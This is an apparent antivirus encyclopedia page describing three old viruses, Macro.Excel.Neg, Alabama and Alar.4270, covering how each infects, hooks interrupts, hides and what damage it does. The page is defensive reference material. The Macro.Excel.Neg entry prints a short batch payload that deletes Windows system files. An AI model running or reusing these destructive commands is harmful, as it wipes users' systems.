Virus Database

Macro.Excel.Neg

Description Macro.Excel.Neg

This virus infects Excel sheets. It contains six functions in one module Dollar: Auto_Open, Fuck, Auto_Close, cek_global, infectglobal, and inFuckIt.
While loading an infected document, Excel executes auto macros auto_open, and the virus takes control. The virus auto_open macro contains a command that defines the F*ck macro as a handler of the OnSheetActivate routine. As a result, the virus hooks the sheet activate routine, and while opening a sheet, the virus takes control.
When the auto_open macro takes control, it searches for DOLLAR.XLM files in the Excel Startup directory. If the infected macro is an active Workbook and the DOLLAR.XLM file does not exist in the Excel Startup directory when the virus is executed for the first time, the virus creates this file and saves its code to it by using the SaveAs command. When Excel loads its modules the next time it automatically loads all XLS files from the Startup directory. The infected DOLLAR.XLM is loaded along with other files, and the virus takes control and hooks the sheet activation routine. Upon activation of a sheet, the virus copies its code to the active Workbook and as a result, spreads its code to this sheet.
The virus deletes 25 menu items related to macro viewing/editing/etc, if they exist. On the 13th of any month, it appends to the C:AUTOEXEC.BAT file commands that erase Windows files:
@ECHO OFF
CLS
cdwindows
del *.com >nul
del *.vxd >nul
del *.drv >nul
del *.dll >nul

The virus contains the comments:
------------------------------------------------
Generated with NEG !!. Please include this text
------------------------------------------------
NEG is Trademark of NoMercy
Date generated : 27- 3- 1998
VirusName: Dollar
Author: NEG
Module Name: Dollar
Template: DOLLAR.XLM

Check other viruses! Be aware! Use Antiviral Software

Alabama

Description Alabama

It is a very dangerous resident virus. It affects .EXE-files in the current disk directory, where a file is being run from or opened in. An infected file is being searched by the FindFirst and FindNext functions and not necessarily coincides with a file being opened or executed. On infecting, "Alabama" uses FCB-functions for work with files, appends to the file end; incorrect infection is possible. In an infected file the time of last modification is set to 62 seconds.
This infector tries to "survive" a reboot - for this purpose it sets INT 9h (keyboard), hooks the Alt-Ctrl-Del combination, then turns off the screen and calls the boot procedure (INT 19h). During this operation the codes of the virus are not erased.
Depending on the current time "Alabama" might displays the messages:
+-----------------------------------------------------+
¦ SOFTWARE COPIES ARE PROHIBITED BY INTERNATIONAL LAW ¦
¦ ¦
¦ Box 1055 Tuscambia ALABAMA ¦
+-----------------------------------------------------+

The virus hooks INT 9, 21h, contains the text string "????????EXE" and doesn't have destructive functions. But it works incorrectly with files and the memory - might hang up the system.

Alar.4270

Description Alar.4270

This is a very dangerous memory resident multipartite polymorphic and stealth virus. It writes itself to the end of COM and EXE files and to the MBR of the hard drive. When an infected file is executed, the virus infects the MBR of the hard drive. Then it hooks interrupt vectors (as well as while loading from infected MBR) and stays memory resident. Because of an error the virus corrupts the hard drive that have less than 18 sectors per track while infecting them. The virus infects the files that are executed or closed and disinfects the infected files that are opened.
The virus hooks INT 21h for file infection and stealth, INT 13h for disk stealth and to hook INT 21h while loading from infected disk, INT 17h to change some data that are printed, INT 1Ch for a video effect (the virus "shakes" the screen). While infecting the MBR the viruses temporary hook INT 10h, 16h (video and keyboard) to fool internal BIOS anti-virus protection.
The virus intercept command line commands and when the "stop creeping" text is entered, the virus disable their infection and stealth routines. When the "tell me your version" text is entered, the viruses display:
Alar Abaddon virus. Version 1.2 (peaceful)
Created by Gall.. A..... (C) 05/29/97
When the "do it right now" text is entered, the virus erase the CMOS.
The virus checks the CRC of their INT 21h handlers' code, and if this code is modified (TSR part of the virus is disinfected), the viruses display a message in Russian and halt the computer.
Being executed under minor DOS versions the virus displays the message and returns to DOS:
Invalid parameter missing

Home